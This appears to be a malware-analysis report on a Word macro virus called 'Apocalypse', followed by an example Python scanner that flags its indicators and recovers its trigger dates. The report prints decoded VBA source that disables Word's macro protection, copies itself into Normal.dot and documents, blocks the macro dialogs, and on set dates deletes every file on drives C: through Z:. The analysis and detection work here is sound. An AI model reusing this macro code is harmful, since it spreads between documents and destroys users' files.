Verdict: MALICIOUS
Risk Score: 208

Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1485 Data Destruction
The sample is detected as Win.Trojan.Psycho-3 by ClamAV. Its VBA project carries an 'Apocalypse' module whose AutoOpen and AutoClose entry points (and a FileSaveAs procedure that hijacks Word's built-in Save As command) call ExecuteApocalypse. That routine replicates first: if the module is present only in Normal.dot it exports it to %windir%\Kill.bmp, imports it into the active document, deletes the temporary file and saves the document; if it is present only in the active document it wipes the other modules of Normal.dot and copies the module into the template with Application.OrganizerCopy. It then runs the destructive Apocalypse payload only when the day of the month is 1, 13 or 26, or the month is April: the payload walks drive letters C: through Z: (Chr(67) to Chr(90)) with Application.FileSearch, deletes (Kill) every file found, and ends with a "The Apocalypse has come to You!" message box. AutoOpen also lowers Word's defences by switching off Options.VirusProtection and writing 1 (Low) to the Level value under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security (Word 2000) through System.PrivateProfileString. The module further defines ToolsMacro, ViewVBCode and FileTemplates stubs that answer "Sorry, access denied." so the user cannot open the macro or template dialogs to inspect it; these same-named procedures are also what the legacy WordBasic marker heuristic below keys on.
Heuristics (6)
- ClamAV: Win.Trojan.Psycho-3 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Win.Trojan.Psycho-3
- Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Auto_Close macro [high] OLE_VBA_AUTOCLOSE: Auto_Close macro
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON: Environ() call (env variable access)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19942 bytes | 857740abb6fad5295bbca570559cf756eefa5f7c370f41f9e42e570e8341d6e1 |

Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Apocalypse"
Public I As Integer
Sub Apocalypse()
On Error Resume Next
For k = 67 To 90
drive = Chr(k) & ":\"
With Application.FileSearch
.NewSearch: .LookIn = drive: .SearchSubFolders = (True Or False)
.FileName = "*.*": .MatchTextExactly = (True And False):
.FileType = msoFileTypeAllFiles
If .Execute > 0 Then
For I = 1 To .FoundFiles.Count: Kill .FoundFiles(I): Next I
End If
End With
Next k
MsgBox "The Apocalypse has come to You!", vbCritical + vbOKOnly, ""
End Sub
Sub AutoOpen()
On Error Resume Next
Options.ConfirmConversions = (True And False)
Options.VirusProtection = (True And False)
Options.SaveNormalPrompt = (True And False)
Application.DisplayAlerts = wdAlertsNone
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
ExecuteApocalypse
End Sub
Sub AutoClose()
On Error Resume Next
If InStr(1, ActiveDocument.FullName, "\", vbTextCompare) <> 0 Then ExecuteApocalypse
End Sub
Sub FileSaveAs()
On Error Resume Next
ExecuteApocalypse
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub viewvbcode()
On Error Resume Next
MsgBox "Sorry, access denied.", vbExclamation + vbOKOnly, "Unexpected error..."
ShowVisualBasicEditor = 0 'h
End Sub
Sub ToolsMacro()
MsgBox "Sorry, access denied.", vbExclamation + vbOKOnly, "Unexpected error..."
End Sub
Sub filetemplates()
MsgBox "Sorry, access denied.", vbExclamation + vbOKOnly, "Unexpected error..."
End Sub
Function CheckForApocalypse() As Byte
On Error Resume Next
CheckForApocalypse = 0
For Each Item In NormalTemplate.VBProject.VBComponents
If Item.Name = "Apocalypse" Then If Integrity(2) Then CheckForApocalypse = 1
Next
For Each Item In ActiveDocument.VBProject.VBComponents
If Item.Name = "Apocalypse" Then If Integrity(1) Then CheckForApocalypse = CheckForApocalypse + 2
Next
End Function
Sub ExecuteApocalypse()
Dim stat As Byte
On Error Resume Next
stat = CheckForApocalypse
Select Case stat
Case 1
DocInfecting
Case 2
NormInfecting
End Select
If Day(Now()) = 1 Or Day(Now()) = 13 Or Day(Now()) = 26 Or Month(Now()) = 4 Then Apocalypse
End Sub
Private Sub DocInfecting()
Dim Infect As Boolean
On Error Resume Next
For Each Item In ActiveDocument.VBProject.VBComponents
If Item.Name = "Apocalypse" Then
With ActiveDocument.VBProject.VBComponents.Item("Apocalypse")
.CodeModule.DeleteLines 1, .CodeModule.CountOfLines
.CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents.Item("Apocalypse").CodeModule.Lines(1, 129)
If Left$(ActiveDocument.FullName, 1) > "B" And Not ActiveDocument.Saved Then ActiveDocument.Save
Exit Sub
End With
End If
Next
NormalTemplate.VBProject.VBComponents.Item("Apocalypse").Export Environ("windir") + "\Kill.bmp"
ActiveDocument.VBProject.VBComponents.Import Environ("windir") + "\Kill.bmp"
Kill Environ("windir") + "\Kill.bmp"
If Left$(ActiveDocument.FullName, 1) > "B" And Not ActiveDocument.Saved Then ActiveDocument.Save
End Sub
Private Sub NormInfecting()
On Error Resume Next
KillAllObjectsInNormal
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Apocalypse", wdOrganizerObjectProjectItems
SetAttr NormalTemplate.FullName, vbNormal
If NormalTemplate.Saved = False Then NormalTemplate.Save
End Sub
Private Sub KillAllObjectsInNormal()
On Error Resume Next
With NormalTemplate.VBProject.VBComponents
For I = .Count To 2 Step -1
.Item(I).CodeModule.DeleteLines 1, .Item(I).CodeModule.CountOfLines
.Remove .Item(I)
Next I
.Item(1).CodeModule.DeleteLines 1, .Item(1).CodeModule.CountOfLines
End With
End Sub
Private Function Integrity(m As Byte) As Boolean
On Error Resume Next
Dim s As String
Dim l As Variant
... (truncated)
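The behaviours the heuristics and summary above describe (auto-execution entry points, the FileSearch/Kill deletion loop over drive letters, the Security\Level registry write and VirusProtection toggle, the hijacked ToolsMacro/ViewVBCode/FileTemplates commands, the module copy into Normal.dot, and the date gate in ExecuteApocalypse) can be pulled out of decoded VBA text with a small static scanner. The Python below is an added example written for this page; it is not part of the analyzer or of oletools. It operates on already-decoded source such as the macros.bas artifact above, the indicator names, weights and verdict rule are the example's own, and the sample it scans is a constructed, condensed excerpt of the macro shown above. It also recovers the trigger dates, which matters for dynamic analysis: a detonation on a day other than the 1st, 13th or 26th, outside April, runs only the infection code and never reaches the file deletion.

```python
import re
from dataclasses import dataclass
from datetime import date, timedelta

# Constructed sample: a condensed excerpt of the decoded macro on this page,
# with one comment added to show that commented-out keywords are ignored.
SAMPLE_VBA = r'''
Sub Apocalypse()
For k = 67 To 90
drive = Chr(k) & ":\"
With Application.FileSearch
.NewSearch: .LookIn = drive: .FileName = "*.*"
For I = 1 To .FoundFiles.Count: Kill .FoundFiles(I): Next I
End With
Next k
End Sub
Sub AutoOpen()
Options.VirusProtection = (True And False) 'Kill the warning, not a file
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ExecuteApocalypse
End Sub
Sub ToolsMacro()
MsgBox "Sorry, access denied.", vbExclamation + vbOKOnly, "Unexpected error..."
End Sub
Sub ExecuteApocalypse()
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Apocalypse", wdOrganizerObjectProjectItems
If Day(Now()) = 1 Or Day(Now()) = 13 Or Day(Now()) = 26 Or Month(Now()) = 4 Then Apocalypse
End Sub
'''

# Indicator name -> (regex applied per comment-stripped line, weight).
# Names and weights are this example's own, not the analyzer's heuristics.
INDICATORS = {
    "auto_exec": (r"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit|Document_Open|Document_Close)\b", 3),
    "menu_hijack": (r"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:ToolsMacro|ViewVBCode|FileTemplates|FileSaveAs)\b", 3),
    "file_destruction": (r"\bKill\s+\S", 4),
    "file_enumeration": (r"\bApplication\.FileSearch\b", 2),
    "drive_letter_loop": (r"\bFor\s+\w+\s*=\s*67\s+To\s+90\b", 2),  # Chr(67)..Chr(90) is C..Z
    "security_tamper": (r'PrivateProfileString\(.*\\Word\\Security"\s*,\s*"Level"\)\s*=|\bOptions\.VirusProtection\s*=', 4),
    "self_replication": (r"\bOrganizerCopy\b|\bVBComponents\.Import\b|\.Export\s+Environ\(|\bCodeModule\.InsertLines\b", 4),
    "date_trigger": (r"\b(?:Day|Month|Weekday|Year)\(\s*Now\(\)\s*\)\s*=\s*\d+", 2),
}
PROC_START = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)
PROC_END = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)


@dataclass(frozen=True)
class Finding:
    indicator: str
    procedure: str
    line_no: int
    text: str


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment without touching apostrophes inside string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan_vba(source: str) -> list:
    """One Finding per (line, indicator) hit, attributed to the enclosing procedure."""
    findings, proc = [], "<module>"
    for n, raw in enumerate(source.splitlines(), 1):
        code = strip_comment(raw)
        if m := PROC_START.match(code):
            proc = m.group(1)
        for name, (pattern, _) in INDICATORS.items():
            if re.search(pattern, code, re.I):
                findings.append(Finding(name, proc, n, code.strip()))
        if PROC_END.match(code):
            proc = "<module>"
    return findings


def triage(source: str) -> dict:
    """Score distinct indicators; auto-exec plus destructive/replicating/tampering code is malicious."""
    findings = scan_vba(source)
    hit = sorted({f.indicator for f in findings})
    total = sum(INDICATORS[i][1] for i in hit)
    bad = {"file_destruction", "self_replication", "security_tamper"}
    verdict = "malicious" if "auto_exec" in hit and bad & set(hit) else "suspicious" if total >= 6 else "clean"
    return {"verdict": verdict, "score": total, "indicators": hit, "findings": findings}


def extract_date_trigger(source: str) -> tuple:
    """Recover the Day(Now()) = N and Month(Now()) = N comparisons that gate the payload."""
    code = "\n".join(strip_comment(l) for l in source.splitlines())
    days = {int(x) for x in re.findall(r"\bDay\(\s*Now\(\)\s*\)\s*=\s*(\d+)", code, re.I)}
    months = {int(x) for x in re.findall(r"\bMonth\(\s*Now\(\)\s*\)\s*=\s*(\d+)", code, re.I)}
    return days, months


def payload_fires(d: date, days: set, months: set) -> bool:
    return d.day in days or d.month in months


def firing_days_in_year(year: int, days: set, months: set) -> int:
    first = date(year, 1, 1)
    return sum(payload_fires(d, days, months) for d in (first + timedelta(n) for n in range(366)) if d.year == year)


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(result["verdict"], result["score"], ", ".join(result["indicators"]))
    for f in result["findings"]:
        print(f"  line {f.line_no:>2}  {f.procedure:<18} {f.indicator:<17} {f.text[:60]}")
    days, months = extract_date_trigger(SAMPLE_VBA)
    print(f"payload would fire on {firing_days_in_year(2024, days, months)} days of 2024: days {sorted(days)} of any month, every day of month {sorted(months)}")
```

Run it on the output of `olevba --decode` (or any other extractor) rather than on the raw .doc: the scanner assumes decoded text, and the whole point of the WordBasic heuristic above is that extraction itself can be the weak step. The comment stripping matters because `Kill` and `PrivateProfileString` are common words in commented-out or decoy lines; the procedure attribution tells the analyst which entry point reaches the destructive code.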